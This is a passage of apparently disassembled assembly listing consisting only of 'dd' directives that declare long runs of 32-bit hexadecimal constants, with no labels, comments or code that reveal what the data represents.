		dd 49E65D5h, 3E6EBA4h, 0BDB6EECFh, 0ED3EA354h, 0E79052E6h
		dd 0EAECFD42h, 52EA9346h, 47124CD4h, 0BBC654ABh, 537B0787h
		dd 0C7D6FAE9h, 0B459ADDBh, 2698F62Ch, 4D0E7BDDh, 0DF318DE5h
		dd 8F45DC7h, 0D6FB565Ah, 168AC892h, 0F3D040A9h,	0EBD10456h
		dd 79EF7599h, 96276FC1h, 97F0A149h, 7D77BC96h, 295C6D2Ch
		dd 0CBE4DA9Bh, 11541623h, 43924EEBh, 0C57866DAh, 0B7C574F1h
		dd 1205CCB4h, 4AC7D7A8h, 0C5ABA113h, 3A86AAA1h,	0FDA45A3Ch
		dd 6BB8929Bh, 0AB2DC5FDh, 97F71FB6h, 0BFCA58A1h, 37275E7Fh
		dd 0F2A9117Eh, 0E87E3517h, 155B32DEh, 0EAAA1F89h, 0CF049E20h
		dd 87640BEDh, 0C5A34C04h, 73A7DA91h, 0E25CD3B2h, 3C934698h
		dd 2CD37A92h, 777D4E4Dh, 6CB4AA99h, 9CDF354Ch, 7D170E21h
		dd 0B4505BF0h, 70F66A2Ah, 0EC3DD5D4h, 0A3A58DAEh, 0D5DE58E9h
		dd 4779ACDFh, 0FC386AAFh, 0DFB06B06h, 37E57C59h, 0E95F102Bh
		dd 0A05FF626h, 125F34A6h, 303A3A7Fh, 2A6F8AA6h,	2F667D87h
		dd 48A864FBh, 0F417F7BAh, 0D6A5F2CFh, 0EC42CB35h, 9C6F760Ch
		dd 6F61F6E0h, 36B5D97Bh, 1A28753Bh, 52A5DDEDh, 0B37AE91Eh
		dd 494EC45h, 0CADDA917h, 3DEC3144h, 66355A3Fh, 30FF87B8h
		dd 55AD5A64h, 0C70275F9h, 0ED2E1CEDh, 526D6344h, 2BD08F0Bh
		dd 0B1DED37Ah, 0F8FA1959h, 0FA85FCE5h, 0B53DAC1Ah, 0F8BDD1F1h
		dd 0E17B12DEh, 4C0DA39Bh, 74173449h, 29B7C81Ah,	0CD7587FBh
		dd 0B2901959h, 0D2935C8Eh, 870EB11Ch, 77208FF8h, 1B78DB43h
		dd 57804CBEh, 0D738AB30h, 0C7DCAEFAh, 404866F8h, 35553513h
		dd 0F14CD276h, 3DCC7676h, 6C07B03Fh, 6F817B7Dh,	652416D5h
		dd 685D3F3Dh, 0A60CB6Dh, 5C55BB28h, 0EC67D7E5h,	5FB7BBF5h
		dd 4C4EA8DCh, 7AE37DDCh, 6592D1FBh, 31F96FAFh, 7F4120Bh
		dd 0ACEB00ACh, 43E095A2h, 81D8825Ah, 0FF16952Ah, 55DF1EE6h
		dd 1BB3AC39h, 7AF00E41h, 0B5559CFDh, 5745ABD0h,	0D187E0FBh
		dd 0BC27E8E4h, 0F6F3C21Fh, 50FF835Ch, 0B0E693C5h, 0F14E4847h
		dd 11AF3FD4h, 64573474h, 1F81DE73h, 21148AB2h, 0F477F5D4h
		dd 0EDF038E8h, 0D552B43Ch, 768944EBh, 8508FF2Ah, 0E3BE5CCEh
		dd 0FF51ADC8h, 0F9B68C07h, 6054D9E1h, 67279A79h, 371B479Eh
		dd 4AC67923h, 89D09B8Fh, 0AB4D15B7h, 126FBE5Bh,	6785AB1Dh
		dd 0F9B80697h, 4B2B81F3h, 0A92D3179h, 0AC4287CBh, 0DF7DEBAAh
		dd 53A344A4h, 7C1F1F81h, 0BAB56FD1h, 22AD02A8h,	0B03E543h
		dd 60362966h, 8D96D8A4h, 79B1EED8h, 0DFA7EAF0h,	0B4625CCFh
		dd 0C17D8789h, 2C417A08h, 658B9352h, 0C04E19FEh, 95EC4AF2h
		dd 0B4C830F0h, 18D56EBAh, 65C275AAh, 0E9B1FC61h, 0A1437E85h
		dd 708A7D67h, 0F5F6FBEBh, 9543BED0h, 55052D4Fh,	6DA3D9D3h
		dd 0C01AC251h, 0A95A7954h, 0A9197BB0h, 120508FDh, 0C8F05798h
		dd 0CE46B557h, 0A3FABD68h, 88274BF8h, 0F9F5AFCh, 0F53C221Eh
		dd 45037D69h, 3EAC56BBh, 8D451A4Bh, 5F9D4217h, 0D3E5367Ah
		dd 0DC5A3CDAh, 44D305FEh, 8DF894BBh, 0C0A591EBh, 0D0EC0Bh
		dd 0A3C2D865h, 4DFB1546h, 0FCC059AEh, 65BB1069h, 4946B274h
		dd 383C56A7h, 0D5A7FAh,	9286F549h, 9995CE67h, 171A7AF2h
		dd 4ACB5D71h, 749A3AA8h, 56D1E550h, 743DED57h, 6C5E5FDCh
		dd 680D781Fh, 60C86B6Eh, 6EB62196h, 2F24F249h, 1548F4CCh
		dd 4B9B59A4h, 7E897E37h, 7A741ABEh, 2F9557E1h, 4D4DB768h
		dd 0DB56F2BCh, 0A373F749h, 0C316E7B1h, 767EB90Fh, 8C4BC137h
		dd 5B8268DAh, 4ADE8FD5h, 0DD67B14Ah, 0A36AC21Bh, 331A5ABAh
		dd 3227E247h, 0D94F68F4h, 4B5642E4h, 0E3DDDBD7h, 3B67C4DFh
		dd 1273ACF0h, 0FEDA95D7h, 375EE75Fh, 72853E90h,	666CDE88h
		dd 827F4DBAh, 0E0FB8942h, 6A35891Ah, 136DEFBh, 5005D5FDh
		dd 0C07D7C50h, 0E07B64ABh, 5E47B9A8h, 379CD86Eh, 82351187h
		dd 55735E7Dh, 5C260F19h, 0CD444D09h, 0FA5C581Eh, 3B15D64Eh
		dd 0B6595B2Eh, 82E152D7h, 3CB7676Ch, 65D8D465h,	0A8F43FC6h
		dd 0F6788ACAh, 0BA91254Ch, 0DCD5C49Ch, 94A77D4Eh, 71CE42A0h
		dd 8E1BDBAh, 0B5F077C7h, 3EA7C511h, 0FDCB8C0Fh,	0C4A35FBAh
		dd 7AD193CAh, 0A057B896h, 5D22F2BAh, 8FB1B390h,	0E8F7A7EAh
		dd 5588B9DFh, 0E1059D40h, 0F854C8D4h, 2FA1DF20h, 0A22330BDh
		dd 70993791h, 0F65D4EA4h, 2B132330h, 0D5950D75h, 0B5D4E852h
		dd 814FCC66h, 0D5F117F1h, 503FE2EBh, 466108FBh,	2D1D2A44h
		dd 55E95128h, 0AEFD3833h, 0DFA6A585h, 0F7E34D4Ch, 0D75702D9h
		dd 4344CC72h, 1CA90BCBh, 0B177704Bh, 0A8D39305h, 0A953124Ch
		dd 7FB62B4Ah, 0E257A9ADh, 0D18744D7h, 31CAA3CBh, 0F31284E7h
		dd 37A8BCBFh, 0D29BA523h, 0F8B0B4B1h, 0F2C815C0h, 4F6D4457h
		dd 6DFD36DDh, 0A2E60FE5h, 0ED713C09h, 7F57C465h, 0ADD0FEF9h
		dd 0BFA543EDh, 0A7500187h, 9968672Ch, 7F46A4CFh, 530F8147h
		dd 0D58B1D9Ch, 7BAC7EABh, 0BF6F068h, 0D8B9B977h, 0E513E272h
		dd 568E378Eh, 0D2E03244h, 0AAC86263h, 0FD342C91h, 2514B9EDh
		dd 3E06BE43h, 0BE69986Bh, 0FBB69EF2h, 66EAA12Bh, 29FE235Fh
		dd 73D7BB66h, 8A83EC28h, 3C888748h, 7FF6C6B0h, 0C6FFEC83h
		dd 20C42FE0h, 0C5E8630Bh, 0DCDB8B17h, 7DA0AC7Eh, 0C896DC85h
		dd 9AB4848Fh, 687279D8h, 5229ECD2h, 45F1ACA5h, 0C88CA394h
		dd 74F94B83h, 0A6636257h, 0FAD6C50Ch, 0CFECC43Ah, 33AB044Bh
		dd 39BE701Ah, 0A0EB05E9h, 2316E2FAh, 82492F24h,	0DCBAF750h
		dd 68B466B5h, 766C942Bh, 0FF6EC937h, 41B70F42h,	6410BCEAh
		dd 0C2409146h, 0B2D0F894h, 8579574Dh, 4E294F56h, 0C15C7DE7h
		dd 6A376829h, 493E655Bh, 0CD79D1F7h, 0B9C38A3Eh, 5CEC3BCAh
		dd 331CD805h, 193092A4h, 3F7FB74Eh, 0CB448FF7h,	9BB7E74h
		dd 76272241h, 9983C3F0h, 0DE651B81h, 4E0B63B0h,	47A698C3h
		dd 7C343106h, 0CA2F08BEh, 72EF4AFFh, 0C7B8EFB7h, 33C703D9h
		dd 3756FEF6h, 0EA560836h, 44837745h, 0FD32BD6Bh, 0E842EF30h
		dd 0A9B3E59Dh, 0F3D5AB28h, 4939C4DCh, 87EF864Dh, 16E49F1Ch
		dd 28BEC077h, 2AB2FE9Ah, 82A6C662h, 1C9C7CCCh, 0EDC154F7h
		dd 6BE3EF03h, 0A98C6172h, 75D7CA6Eh, 0A8B8811Ah, 0E9E9801Ah
		dd 0E1DDE7D6h, 0B9EC492Eh, 45F7918Bh, 0A11E7B38h, 6511B62Ah
		dd 0F0680449h, 3F629FB6h, 0D6ED0E60h, 5A26F2FBh, 0DE22EBB1h
		dd 3447F4B9h, 0A1CCB781h, 274FE321h, 2DD3D779h,	131EDE7Eh
		dd 1B615FA7h, 0F5AFB85Ch, 310871C0h, 4F66E4B8h,	0B0A41AB7h
		dd 0D7643A8Fh, 1ADAA5A3h, 2BB6564Eh, 0BEAFF02Fh, 7FB3746Eh
		dd 9F0CE478h, 9152CC80h, 0BAE57DF2h, 66836330h,	0CED1E2F3h
		dd 82F34A06h, 85D28D04h, 0C63D8A56h, 0DCB658E8h, 15C193A3h
		dd 0CDD3822Ah, 97B3B98Ch, 3E9CC72Ch, 4F3F4BF9h,	0AEC4C85Eh
		dd 0C6078B84h, 0C39141F6h, 6E630676h, 0AF82CDB4h, 4AB66ADEh
		dd 0FD0DBBDBh, 0B4AEB4FAh, 9408B79Eh, 0E603B6EDh, 137D6B1Ch
		dd 165010D1h, 0EAF2AB95h, 62EE1354h, 0EBFA47A0h, 0E829FDC4h
		dd 0FB1C7C7Ah, 0A6D4114Bh, 0CB2F253Ah, 24EE2B7Dh, 0FCE7FD0Bh
		dd 0E5497581h, 73C7621Ah
		dd 92C572C1h, 0C5EBF30Dh, 0BD34AFDDh, 0EFFC88C0h, 67F44AE5h
		dd 9A76D60Dh, 2CEE2FE5h, 0BE782D37h, 5C166276h,	25245599h
		dd 0A85659D5h, 2D122905h, 0DF42196Ch, 2C4AED1Ah, 0CA356FF0h
		dd 8789164Fh, 7CCC767h,	0D639DA2Eh, 0E21F6B97h,	0BC308BB4h
		dd 0FDF81B9h, 92A8933Eh, 5CF7A053h, 0A68E145Bh,	98560DB1h
		dd 756C91Fh, 79C2EF0Fh,	50580BAFh, 9119BB5Fh, 8AF7C1D2h
		dd 0F4DBC131h, 0A2F74CB2h, 35B551FEh, 807BA99Fh, 37125457h
		dd 7695D4B0h, 0C991C23Ah, 0BB819A26h, 853D34F9h, 0F85C8B0Dh
		dd 0C66C5724h, 0EF647E50h, 0B53908F1h, 82433957h, 0D2EECF1Eh
		dd 953BF1B3h, 2B15F39Eh, 0D35B453Fh, 0F1B07F8Bh, 0AF2279E1h
		dd 345CA5DDh, 8FC0021Eh, 6E8E8607h, 475ADAF3h, 8B38AA5Eh
		dd 66E26999h, 0A4A2E3B4h, 3E95F8B2h, 7F909A5Ah,	1E8A3B77h
		dd 63843C08h, 4D8C07A6h, 498BFB2Ah, 0D718FA32h,	0DC458E42h
		dd 0ACADC41Eh, 8ECE7AD1h, 874CF5BAh, 0F93759F6h, 0DDBEF60Eh
		dd 582FCBC0h, 0BD529735h, 2CB8A983h, 0DABDB449h, 0BB6F9C03h
		dd 0CAF270E1h, 0C65DE8EEh, 0FEA99FEAh, 0B87F93F0h, 0F512CE20h
		dd 0E1217C4Ah, 0BF11BA0h, 0D89FF8ADh, 693D4661h, 5F953BD7h
		dd 7F5E8F1Eh, 0DA471F23h, 0CF172362h, 2E475B00h, 0F614B8DEh
		dd 138775F0h, 8E2ECC29h, 23EF9528h, 16A4ECA5h, 0B51D2A88h
		dd 857DB5D3h, 0AF161BBBh, 0DCBDE256h, 7D27A169h, 570F6886h
		dd 2FAD916Bh, 0E94DC661h, 0C92F5C9Ch, 0D96826FFh, 9C44CBB0h
		dd 2EA9EAA6h, 71DABAEFh, 0B22BEF8Dh, 0E3FB6516h, 0E4DE451Fh
		dd 99B75F65h, 0AF8CF739h, 4717D68Fh, 61492699h,	0F6B51A76h
		dd 963969B3h, 0EDFD0090h, 0D6C4A054h, 0A4575E78h, 0E8D17565h
		dd 0D63449D6h, 16C0B81Bh, 78E192B7h, 6892F3CAh,	116D7920h
		dd 0ACEF7B1Ah, 4A8E554Ah, 534AD59Dh, 807443F0h,	0B6331ABAh
		dd 0D986EE5Dh, 2ACA6D81h, 0F6CD542Eh, 467079D5h, 68723B29h
		dd 5553F9D6h, 0BF5B8111h, 0B444C871h, 38B24551h, 2DFEEBF8h
		dd 0AE92D779h, 0BC2BEB79h, 0BB3D8907h, 641717B6h, 0A67A5FB4h
		dd 0C905FEBBh, 93AFCAB9h, 41181EB3h, 7182B3DAh,	0F9FD8428h
		dd 0B10A260Bh, 10AF24A2h, 0FDB98D4Eh, 66E52E49h, 0F06D2E68h
		dd 2FC78956h, 0E68494A7h, 51F77A41h, 7A072DAFh,	0C122F6DDh
		dd 5D17A36Ah, 0FD80102Ch, 0B44EE0F1h, 0FC7B51E4h, 0BCD9777Dh
		dd 22E5DD90h, 0CD125EC9h, 8B126A8Ch, 6981CB36h,	2F1FEA0Eh
		dd 0A8C4F9C1h, 0ED1D276Bh, 7C593B1Ah, 5AC2CA32h, 0CC63675Eh
		dd 69FAEB2Bh, 11C01867h, 0B5CD74E0h, 70FC1EF7h,	93CC7EE9h
		dd 8FC41C78h, 8B46052Eh, 0D7027735h, 8BB813E8h,	0BACA63E6h
		dd 0A16056DCh, 0BB49EAD0h, 9F07E151h, 762494CBh, 0BF719D11h
		dd 0B13E2DD7h, 0C3DAB366h, 3F1BBC20h, 5F58DC30h, 3BFDA5F3h
		dd 5A30563Eh, 4AD7CA85h, 0ACDCEBBFh, 5E319BE6h,	0D01CB665h
		dd 12F1361h, 9D684A45h,	672887BBh, 5E2FC5BAh, 4DCDA84Dh
		dd 7C9E5ABAh, 869AFE83h, 5D151927h, 0CA653138h,	0CDECE2F5h
		dd 53DE3498h, 2FCFB8E5h, 2A33591h, 0D619F195h, 7921BAh
		dd 0E8F05923h, 3086D1A4h, 0D139835Bh, 0EAC243F0h, 9F2532F5h
		dd 0E07C0363h, 0FE169688h, 51A1992h, 0BCA8990Eh, 0EA017BDFh
		dd 9A024151h, 27BB1BF2h, 0BA4B4C71h, 2906B9A2h,	0D2962342h
		dd 91D639E2h, 7773AB3Ch, 29C36CB3h, 6B6BAE31h, 6F7578E8h
		dd 0BF6534B4h, 0EEEFFE44h, 8380D5D4h, 309C06D6h, 0D0B685Fh
		dd 0B7EBEE1Eh, 3B1746EFh, 17C8A8A9h, 666D9EA6h,	0C6A7E11Dh
		dd 0C7FA1C7Bh, 93E576AFh, 8EA9339Ch, 0CE625F00h, 97CE5A0Ch
		dd 961A6B67h, 5AE388EEh, 484E336Eh, 0E5DB905Dh,	38149DB7h
		dd 0D9CD9E97h, 393ADD68h, 3B8632D1h, 23DDE67Bh,	55EF0A28h
		dd 914B97C6h, 20D23629h, 0ADF658A8h, 0C25549E3h, 0B94DC053h
		dd 7F10DB8Ch, 0B6713385h, 7381A72h, 0E73E7EBBh,	4C7DA19h
		dd 0CEB510E4h, 0A37AB6AEh, 59AC95E2h, 4AD5B780h, 166F81B3h
		dd 0E1942A10h, 3356DD0Fh, 0DEB8E22Dh, 0CC096EE2h, 5A927E20h
		dd 710C6BFCh, 685AA11Ah, 8E2FE579h, 5F0E9CC9h, 35DD86E0h
		dd 9BF5CE09h, 53832CC8h, 8C36F60Ah, 0A3D7070Eh,	5CF299BCh
		dd 57B388D4h, 5D7EF035h, 3E8F7246h, 67556A6h, 0AD13A9BCh
		dd 911ACC81h, 32B1954Dh, 71A9BF4Bh, 406CF37Ch, 453465D6h
		dd 9DA47841h, 26DE0BD2h, 0ABFA0BDh, 68DE0F72h, 125F240Dh
		dd 339FAFECh, 3B28327Ch, 6EA8CC06h, 0EF04B478h,	42AA9A4Fh
		dd 3A5A9425h, 54F09BDAh, 43A17587h, 1D56D897h, 0D59D2ACFh
		dd 54EA8A42h, 844FCCB3h, 0E093352Ah, 368AB533h,	0DD956B7Dh
		dd 6C6C8E51h, 9BB17AF0h, 0E518910Dh, 8B3FC0CEh,	0E4CD70E9h
		dd 0A531115Ch, 17E0597Ch, 8FE1AC4Ch, 0AECB48Ch,	0BD2B965Ah
		dd 9BCB05CFh, 0F8EE6958h, 1122D0C0h, 0BDA33BEEh, 0DCF0FEEFh
		dd 36454F0Eh, 0CA8D653Ah, 0D9398F86h, 1F42A665h, 0C3955968h
		dd 0AFF8B0FEh, 59F780EFh, 0B98B7D8Bh, 0AE348476h, 54052E16h
		dd 0D485AAD6h, 8DFD37A5h, 133DF2D8h, 31DD9D2Bh,	0C52498B3h
		dd 65495DB6h, 87EB705h,	6564B7B3h, 2E790329h, 0DFB2DEB9h
		dd 6D888DD3h, 0AD053A53h, 47D34CE1h, 1B73A330h,	0D732FCC6h
		dd 0CAC36899h, 0DD3DDAEBh, 8AF3FE18h, 630C5BAEh, 7C6DBB77h
		dd 37D3FE16h, 9D782E0h,	0AB49661h, 0A235E7FBh, 79777E33h
		dd 3FC4FE8Ah, 0A73177CFh, 1F3A327Fh, 0E6C8CCA4h, 0BA29BC36h
		dd 9EED6955h, 87522A1Eh, 75363EC1h, 7B70323h, 2B54F112h
		dd 8540E1EEh, 0E67758FEh, 0F449B7ACh, 0A066327Eh, 69448896h
		dd 0E355B03Eh, 4F42121Dh, 4BC316B3h, 492EA970h,	3D62D4A9h
		dd 0FB45B575h, 1A0DF6F1h, 849F9798h, 70ED7873h,	9E7A0E53h
		dd 8020FCB6h, 6D91059Eh, 0FA69BB69h, 9C6CB50Ch,	0A8858701h
		dd 0F96C45E7h, 8A62F2DCh, 0CDACD521h, 0FB99C5E7h, 6BAF8BDEh
		dd 6665CE9Eh, 55F2E2A1h, 0EEB26A2Fh, 312E0ABCh,	353BFF08h
		dd 383C2C4Ch, 0FA9B9884h, 0F8C23721h, 0DDA27665h, 54634564h
		dd 308FC8Bh, 0C1E7BF61h, 0C0416E0Ah, 971B2FC0h,	2FC730DFh
		dd 5CFC86E3h, 16673D3Dh, 0BC36A903h, 53BDAF99h,	9BDAE7ABh
		dd 0C4C5CCDFh, 0BF696E3Bh, 16B9A997h, 0E6FECAFh, 0D3128008h
		dd 32836797h, 2DD1CEBFh, 74BF25A9h, 0A24FDDB5h,	0F75CAAB5h
		dd 0EF2236C1h, 2E4FA04Ah, 9C52E7F6h, 0C3750FD7h, 17600382h
		dd 5C358459h, 728ACB2Bh, 48499C54h, 0D5DAB90Ah,	0F63968FDh
		dd 9DF8326Dh, 0FA478B95h, 0CF0F2F47h, 0F86E4F6Eh, 0A6EEC7C0h
		dd 2083A4Eh, 0DB3A17FBh, 0DADDD43Fh, 689F5C8Ch,	95ABD663h
		dd 0DF3BD790h, 0FBDD3E91h, 102F3E86h, 0AF191B79h, 0C35EF25Fh
		dd 0FF5AD4BDh, 71A1AC67h, 0ED110491h, 0C7E9F648h, 0F5DFD9A8h
		dd 0D1F13595h, 68C48A1Ah, 5E7BE8B3h, 0F61F6DD8h, 41156AF7h
		dd 5D518385h, 11259944h, 0BA45402Dh, 0C810FDB3h, 0FF82EA5Eh
		dd 5F788953h, 0AA5A8FE4h, 0AAFA244Ch, 0B0D0DB8h, 81B58333h
		dd 0DC995773h, 0DA3DBBA7h, 0F49DD6A9h, 569E7518h, 0C61FE22Ch
		dd 2EE22E35h, 3FA08487h, 676FBA9Ch, 0A791657h, 66CDE88Dh
		dd 0F96056D3h, 0FE7DF1D1h, 0D23CA9A5h, 0DEF898DCh, 0C091CB51h
		dd 0C5DCE736h, 0CD9179D6h, 0F30D006Ch, 0CD675F28h, 0A9245246h
		dd 0B07E303Ch, 5C074ECBh, 5D0BAE0Bh, 85F72F03h,	0B9DA922Ch
		dd 0F6A863E1h, 79573AB4h, 43DF13F9h, 66F7E6F1h,	0C8E13C4Bh
		dd 0AD9EBA22h, 0EDC89389h
		dd 55B61C0Dh, 0D3FFF781h, 0A8D32E5Dh, 127298E2h, 0A1E9B5F7h
		dd 0EB4ED155h, 0E662A20Ah, 0D68609E0h, 0D61EA530h, 557A092Ch
		dd 7286ECECh, 75405143h, 0B3CBD55Ah, 357F7235h,	0E23678F5h
		dd 0B8AB9AB4h, 92D9636Dh, 0DA62F2ACh, 6DE639C9h, 613790F2h
		dd 0C3AED0FCh, 0A986B7Ch, 0D41BED15h, 0A50F45F4h, 22F158D3h
		dd 0B1264B05h, 0B4BB4AA2h, 6EA864B8h, 1818E0D2h, 0D6691CDEh
		dd 79185EB2h, 0F115E34Fh, 0A2A4FBC3h, 3134D59Ah, 212CCAB9h
		dd 0FD26EC97h, 0B646619h, 56991A81h, 2395E8BBh,	0F0226A6Bh
		dd 0CA7F8948h, 57D63B4Ah, 1DA08EDFh, 95AEA29Bh,	467B5A28h
		dd 92279A9Dh, 9AA86BBDh, 0A6A7364Ah, 5D96C426h,	98AAF136h
		dd 0F85C2247h, 0BF66CA92h, 52B15551h, 0AE0B33D3h, 26CE774Fh
		dd 6B39A8FAh, 830DBAC6h, 7319E7F3h, 0B8D35655h,	0A52F515Dh
		dd 0C96F1DCAh, 67AB6FB1h, 0AB1DDF81h, 7BF4596Dh, 1F1392EBh
		dd 830A6F38h, 181EED6Ah, 5FD85A77h, 0F8EB7D73h,	340E87FDh
		dd 7BFCFC36h, 0D9A2F15Dh, 857B4FDAh, 9DFE2EE0h,	1725B580h
		dd 16D89C3h, 0A286017Eh, 90E9D56Dh, 79CBDB4Fh, 7164F984h
		dd 0B87758DDh, 0C5E245EEh, 1BDD922Ah, 71035C0Ch, 65A40ABBh
		dd 0BB82766Eh, 0AE4D8234h, 0E5351E5Dh, 0FB82EDD2h, 8EC66AD8h
		dd 4BA56568h, 5FCC1ABFh, 225485F2h, 0BE50EF51h,	8AEA026Ah
		dd 503F548Fh, 44B3D1E7h, 0C4B8381Fh, 2E67E1D7h,	43C7F9F1h
		dd 0B30F1D79h, 0BA0B938Bh, 5F17C774h, 8A44B59Bh, 5197DE40h
		dd 0B47521CCh, 3FA661D6h, 0CB0BAA4Dh, 0F6728AD6h, 0F1D352BAh
		dd 0F8056BC3h, 0AEDDDDC3h, 74A5FC56h, 0BDCC5D96h, 0E2E1F2B7h
		dd 8CDD156Ah, 4DDFE96h,	3DA811ADh, 5DCF64F0h, 7ED14EBAh
		dd 1D7EFBF1h, 161D9BD5h, 8F12BB4Bh, 0E0BBD073h,	5799A82Ah
		dd 7466D7D5h, 0EE34FB25h, 0E2529319h, 5AF931D4h, 25B0C513h
		dd 0DE68A929h, 7DBA353Ch, 0E5B8605Eh, 11B63FE5h, 0C3ECC24Ah
		dd 1397C3F9h, 0D1D05B26h, 7E6B3302h, 3F3FAB02h,	0C0F4F50Fh
		dd 5A8CA6AFh, 0E887E13Fh, 0F1EC1237h, 0D3EFC5F7h, 92AF1E05h
		dd 72FA68DCh, 0FAA268DDh, 0FEBF732Ah, 7D459043h, 986A12FEh
		dd 6755C217h, 9AE202ABh, 0AA13C5BAh, 0D989386Ah, 246A68C9h
		dd 4FBD8D3Bh, 3B97607Fh, 0B4B48A01h, 3BE9CEBEh,	45888153h
		dd 4E1E3A85h, 3BB4E2E3h, 0CD145FFAh, 783B8B36h,	0CC36B160h
		dd 0AEC1E330h, 0F06B1E7Ah, 169EAA43h, 0B9E148A1h, 5E275281h
		dd 0F049DA3Dh, 8BE72544h, 5DB4B03Dh, 322EDA31h,	94C79EBh
		dd 7A8E52DEh, 8E7F9C9h,	91836E96h, 71F91A8Dh, 9AE37871h
		dd 95AE1F69h, 7BFDCB6Ah, 264D2F05h, 1F346EE6h, 0F2FF699Ch
		dd 79D27D9Bh, 8FF264CDh, 1757F857h, 83940763h, 10B3E2B2h
		dd 4AAF8DCFh, 4069C2CCh, 13D3545Dh, 438B2D16h, 0DF133AF5h
		dd 91463574h, 0FDD9CDE7h, 8290F6E5h, 0C279CB1Ch, 2AB1DA45h
		dd 75B2713Bh, 71B46E8Dh, 0F42E905Dh, 63496BAFh,	0E3748BFBh
		dd 9DF6EC27h, 9C7233AFh, 1EAF1F86h, 6B60D7C6h, 0FC172E20h
		dd 0D5C26290h, 0ED763EFCh, 9AD866EAh, 5ED7DFBEh, 79B44F9h
		dd 2398B9F7h, 0F4181672h, 0A697D439h, 73F7ACB7h, 4296629Eh
		dd 0B4F536B9h, 0E35A326Fh, 0DA3CC564h, 544DA889h, 0ECC3029Bh
		dd 92AAC6E0h, 0F8DF55DEh, 4CADCAB8h, 0F56D568Ch, 59EF0Eh
		dd 4655672Eh, 2D60F3F9h, 0B63904BBh, 14E4B472h,	878F9D08h
		dd 5C29DD72h, 58AEC9A3h, 0FAF3A40Dh, 68D7B81Bh,	0E31D63E9h
		dd 4985EECAh, 0A4123353h, 81F97353h, 3D4B7E9Fh,	21C04E1Ch
		dd 589E44E7h, 2976CDD6h, 3C09311Bh, 88B45554h, 0CE72E441h
		dd 0DC05ABDBh, 333C6537h, 0ADE0AC11h, 52A6AA2Ch, 5074E99h
		dd 5884F3F4h, 200E377Ch, 1465C5DFh, 65D11819h, 6B9F037h
		dd 0D8D85204h, 0AC69F62h, 0B86E49Dh, 16A77EE2h,	7628858Ch
		dd 82E95017h, 5D81195Eh, 0EF4B6EE1h, 0C6C95155h, 3B57298Eh
		dd 574D1C81h, 0D5D8DC4h, 0A3985A2Dh, 0D3FBA64Bh, 0D74862DCh
		dd 4BDBECF7h, 0F4977EE4h, 3FFA6B49h, 35E57F1Fh,	377EBAEEh
		dd 0BE7BBE53h, 0A65B7431h, 957936ABh, 0C10F956Ah, 0F4359764h
		dd 5C5CA41Dh, 3675D371h, 521F9CE9h, 7C0CF370h, 29180C1h
		dd 0B7E82F95h, 92308C2h, 447FDBAEh, 55BD6F20h, 4516F55Eh
		dd 0DCB7A45Ah, 0B2DC9325h, 0CE151361h, 5F437DE0h, 5CC3A56Dh
		dd 0FED11EBBh, 0BB0782E2h, 0FB334263h, 0B91331F7h, 3B44692h
		dd 7CFB950Dh, 0D81C48DEh, 3D53B020h, 0B479EE13h, 0B7C2B470h
		dd 0E8390F5Bh, 6F994799h, 0C9B9E122h, 5F2F689Fh, 3583D71Ch
		dd 0FD6B0FFBh, 45E1F377h, 5A3A2AD5h, 33B442F6h,	0EDCEABAEh
		dd 5DEE3FF6h, 8C5B28BFh, 0B6FA7C31h, 20FB3553h,	956B41A9h
		dd 0FA53FF67h, 8A67464Ah, 0A06032C7h, 0EBE2392Bh, 95D74E2Bh
		dd 850696h, 0FEF1075h, 86237E2Eh, 0C9C0EA56h, 93AD8F12h
		dd 0DF86FE40h, 0D9A3FC62h, 0ABE94381h, 0AF65D0E2h, 5FE165DAh
		dd 0C5B296A2h, 682161B5h, 0EA482BFFh, 96A5312Ch, 0A57311B4h
		dd 342F760Ch, 5FD75A1h,	0D8F8C364h, 0AC98BD9Bh,	6E289054h
		dd 8D614E4Fh, 6C379FDFh, 2EDB7948h, 7FEC4154h, 764CE562h
		dd 0F3AA5D15h, 0B7234FC3h, 0FBE9496h, 0C779B3CCh, 0EC58D15Ah
		dd 0CCBF4BF3h, 9982FF8Eh, 378A1EAFh, 33C421Fh, 99B7744Eh
		dd 0CE4B5578h, 0FECC71CDh, 30F79370h, 0FBDACE4Bh, 0D543AC72h
		dd 7CB5EA73h, 2C4F54C0h, 0ED0AB276h, 0A40DA5A3h, 32BACEBEh
		dd 5EF7B6DBh, 23F68C67h, 0D01C4C57h, 448B8F3Eh,	6E93C662h
		dd 0D4E88F16h, 0D85E0FC0h, 0BA246CADh, 0CE6DFF31h, 0A743D273h
		dd 5CF4E8BFh, 0F42B3468h, 202E447Eh, 763B75C6h,	0D6A5929Fh
		dd 0BE85DEE8h, 8D861E2Eh, 0BCC5BB01h, 0A2C4EADAh, 5516118Fh
		dd 95A8F52Ch, 44B88A16h, 989B849Eh, 472A3E22h, 0B63BE8FFh
		dd 28BACE43h, 776B3BCBh, 2B43DD7Ah, 5076A665h, 70A2D2AFh
		dd 566A81F1h, 5A3E7CB7h, 86ED54A8h, 30509B69h, 9972D200h
		dd 0B5CB1C8Fh, 0ADC4A825h, 221F2BC7h, 58C287E3h, 42B4D65Ch
		dd 0D153F22Fh, 26552ED7h, 652F7860h, 1C8EE74Ah,	5E14E7EDh
		dd 73B79C99h, 8A2E49BEh, 0F57A431Bh, 0CAAD4E9Fh, 0C678F8A6h
		dd 62059AA8h, 1CDA459Ah, 102C6897h, 0ED865EDEh,	0DE173E07h
		dd 343CEF91h, 22F3FF58h, 0CE18C8A8h, 2036EF0Ch,	0D1010D33h
		dd 7117226Bh, 0B13881Bh, 0CDCD097Fh, 0C6C65F1h,	132B1915h
		dd 9CE14143h, 3D6991BBh, 77551FB4h, 1812981Eh, 5E0F5C28h
		dd 8562779Eh, 623E260Dh, 5E83F831h, 0A15C1290h,	0CAD47FC8h
		dd 1A4EB7C6h, 4F6AA18Bh, 4E7E7CCAh, 988BD432h, 42E5BEBDh
		dd 0E1759703h, 0CBB880FDh, 0A196AC33h, 70BFC0F0h, 0B0FC0D54h
		dd 7ED7CA35h, 0EAA3CBD5h, 65EA3312h, 0A934A2Bh,	6A6E6CB3h
		dd 8FB150C8h, 4E87013Bh, 2B955D67h, 0E34EE0BCh,	2F620981h
		dd 0E3886614h, 0CEF4E11Ah, 0C551B968h, 4D7D37DEh, 85204E4Bh
		dd 177B9122h, 1DD8CBC2h, 654144AFh, 1D81EBDh, 27F7B51Eh
		dd 0DA9FEFFCh, 849726E4h, 99F9D250h, 1F729B88h,	9A61B93Ch
		dd 67D2F0E0h, 460A2854h, 0C8AA474Bh, 722DF353h,	6513515h
